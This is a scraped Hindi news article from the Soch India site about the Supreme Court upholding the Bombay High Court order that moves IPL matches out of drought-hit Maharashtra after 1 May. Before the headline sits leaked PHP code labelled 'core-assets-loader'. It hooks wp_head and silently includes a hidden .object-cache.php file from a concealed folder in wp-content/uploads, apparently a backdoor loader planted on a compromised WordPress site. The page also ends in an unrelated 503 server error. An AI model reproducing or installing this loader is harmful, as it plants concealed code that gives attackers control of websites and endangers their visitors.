add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); IPL को लगा SC का झटका, सूखे की वजह से 1 मई के बाद महाराष्ट्र में नहीं होगा कोई भी मैच – SOCH INDIA
Menu

खेल
IPL को लगा SC का झटका, सूखे की वजह से 1 मई के बाद महाराष्ट्र में नहीं होगा कोई भी मैच

nobanner

आईपीएल मैच महाराष्ट्र से आउट
सुप्रीम कोर्ट ने आईपीएल के मैच महाराष्ट्र से बाहर कराए जाने के बॉम्बे हाईकोर्ट के फैसले को बरकरार रखा है. बुधवार को हुई सुनवाई में कोर्ट ने कहा कि फैसला राज्य के हित में है.

बॉम्बे हाई कोर्ट ने सूखे से जूझ रहे महाराष्ट्र में आईपीएल मैचों के दौरान स्टेडियम मेंटीनेंस में पानी की बर्बादी पर चिंता जताई थी. कोर्ट ने कहा था कि जनता को पीने का पानी उपलब्ध नहीं है, ऐसे में स्टेडियम के लिए पानी नहीं दिया जा सकता. कोर्ट ने बीसीसीआई से मैचों को राज्य से बाहर शिफ्ट करने को कहा था.

हाई कोर्ट के फैसले के खिलाफ दी थी याचिका
आईपीएल मैचों पर हाई कोर्ट के फैसले के खिलाफ मुंबई और महाराष्ट्र क्रिकेट एसोसिएशन ने सुप्रीम कोर्ट में याचिका दायर की थी और राज्य में मैच कराने की अनुमति देने को कहा था. इन्होंने हाईकोर्ट के फैसले पर रोक लगाए जाने की मांग की थी. हालांकि सुप्रीम कोर्ट ने इनकी अर्जी खारिज कर दी.

एक मई के बाद नहीं होगा कोई मैच
हाई कोर्ट के आदेश पर बीसीसीआई ने 30 अप्रैल के बाद मैचों को राज्य से बाहर शिफ्ट करने की योजना बनाई. हालांकि बाद में एक मई को एक और मैच कराने की अनुमति हाई कोर्ट ने दे दी. एक मई के बाद राज्य में आईपीएल का कोई मैच नहीं होगा.

राजस्थान हाई कोर्ट ने राज्य सरकार से मांगा जवाब
दूसरी ओर, राजस्थान हाई कोर्ट ने आईपीएल मैच कराए जाने को लेकर राज्य सरकार से जवाब मांगा है. कोर्ट ने मैच के लिए पानी के इंतजाम को लेकर सरकार पूछा है कि अब तक क्या इंतजाम किए गए हैं. कोर्ट ने इसके लिए 30 अप्रैल तक का समय दिया है. मामले की अगली सुनवाई 3 मई को होगी.

बता दें कि सूखे की वजह से महाराष्ट्र से आईपीएल को दूसरे राज्यों में शिफ्ट किया गया. जिनमें से कुछ मैच जयपुर में होने है. राज्य में पानी की समस्या को देखते हुए बीसीसीआई के फैसले के खिलाफ हाई कोर्ट में याचिका दी गई थी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.